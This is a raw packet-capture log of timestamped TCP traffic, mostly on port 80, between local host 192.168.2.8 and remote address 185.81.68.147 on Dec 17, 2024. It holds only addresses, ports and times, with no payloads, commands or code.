                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.252630949 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.253371000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.253509045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.253604889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.254298925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.254419088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.254513025 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.255254984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.255310059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.255407095 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.256253958 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.256320000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.256419897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.257261038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.257445097 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.257545948 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.258172989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.258357048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.258459091 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.259140968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.259259939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.259355068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.260068893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.260145903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.260243893 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.261075974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.261111975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.261219978 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.261987925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.262121916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.262217999 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.263010979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.263052940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.263155937 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.263926983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.264003038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.264106035 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.264801025 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.316740036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.336483002 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.379156113 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.407172918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.407188892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.407330990 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.407363892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.407466888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.407506943 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.408179045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.408644915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.408742905 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.409055948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.409169912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.409265995 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.410089016 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.410162926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.410254955 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.410928011 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.411051035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.411143064 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.411914110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.412014961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.412110090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.412817001 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.412856102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.412955046 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.413768053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.413873911 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.413975000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.414733887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.414786100 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.414881945 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.415673018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.415842056 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.415939093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.416632891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.416733980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.416840076 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.417613029 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.417699099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.417798042 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.418641090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.418781996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.418876886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.419497967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.419662952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.419756889 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.420486927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.420572042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.420670986 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.421390057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.421503067 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.421601057 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.422462940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.422586918 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.422679901 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.423304081 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.423526049 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.423623085 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.424299955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.424392939 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.424484968 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.425293922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.425312996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.425426960 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.426214933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.426307917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.426408052 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.427158117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.427333117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.427426100 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.428122997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.428168058 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.428266048 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.429054022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.429142952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.429241896 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.429972887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.430102110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.430201054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.430910110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.431056023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.431152105 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.431926966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.432015896 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.432110071 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.432832003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.432888031 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.432980061 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.433830976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.433912039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.434005976 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.434725046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.434848070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.434941053 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.435699940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.435740948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.435846090 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.436705112 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.436841965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.436939001 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.437575102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.437666893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.437772036 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.438571930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.438630104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.438734055 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.439510107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.439876080 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.439975977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.440464020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.440546989 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.440646887 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.441423893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.441665888 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.441761971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.442337036 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.442486048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.442593098 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.443264008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.443412066 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.443507910 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.444277048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.444400072 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.444495916 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.445187092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.445316076 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.445410013 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.446149111 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.446281910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.446381092 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.447129965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.447227955 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.447324038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.448077917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.448177099 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.448283911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.448997021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.449071884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.449177027 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.449960947 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.450122118 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.450222969 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.450939894 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.451061964 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.451165915 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.451891899 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.452017069 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.452117920 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.452929020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.453008890 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.453105927 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.453855038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.453927040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.454024076 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.454715014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.454860926 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.454957008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.455791950 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.455925941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.456023932 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.456701040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.504112959 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.599277020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.599390030 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.599473953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.599714994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.599845886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.599929094 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.600651026 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.600739956 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.600825071 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.601619005 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.601712942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.601794958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.602546930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.602653980 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.602732897 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.603507042 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.603610992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.603683949 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.604423046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.604507923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.604588985 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.605442047 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.605545998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.605618000 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.606364012 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.606424093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.606501102 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.607302904 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.607413054 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.607489109 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.608254910 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.608436108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.608511925 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.609194994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.609287977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.609360933 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.610260010 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.610313892 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.610387087 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.611076117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.611217022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.611295938 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.612055063 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.612179041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.612258911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.613261938 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.613358974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.613452911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.613966942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.614114046 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.614192963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.614881992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.615010977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.615139008 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.615864038 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.615911961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.615993977 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.616827965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.616944075 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.617024899 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.617882013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.618047953 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.618150949 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.618812084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.619012117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.619086981 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.619680882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.619790077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.619868994 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.620598078 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.620729923 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.620810032 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.621593952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.621717930 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 17, 2024 10:15:06.621788025 CET4970980192.168.2.8185.81.68.147
